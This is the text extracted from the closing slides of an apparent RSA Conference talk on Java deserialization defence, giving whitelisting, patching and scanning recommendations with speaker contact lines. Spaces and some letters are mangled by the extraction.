Don’trelyongadget-blacklis@ngalone!YoucanbuildthewhitelistwithOpenSourceagentSWAT(SerialWhitelistApplica@onTrainer)Preferanagent-basedinstrumen@ngofObjectInputStreamtowardsLAOISScanyourownwhitelistedcodeforpoten@algadgets
IfpossibleuseaSecurityManagerasdefense-in-depth
40
![Page 41: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/41.jpg)
ApplyWhatYouHaveLearnedToday
Nextweekyoushould:Iden@fyyourcri@calapplica@ons’exposuretountrusteddatathatgetsdeserializedSASTmighthelphereifcodebaseisbigForalreadyreportedvulnerableproducts,ensuretoapplypatches
Configureapplica@onswithwhitelistswherepossible
Inthefirstthreemonthsfollowingthispresenta@onyoushould:Ifpossibleswitchthedeserializa@ontootherformats(JSON,etc.),orUsedefensivedeserializa@onwithastrictwhitelist
Withinsixmonthsyoushould:UseDASTtoac@velyscanfordeserializa@onvulnerabili@esaspartofyourprocessApplySASTtechniquestosearchforaEacker-helpinggadgetsExtendthisanalysisalsotonon-cri@calapplica@ons
41
![Page 42: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/42.jpg)
#RSAC
Q&A/ThankYou!
AlvaroMuñ[email protected]@hpe.com
Chris;anSchneider@cschneider4711mail@[email protected]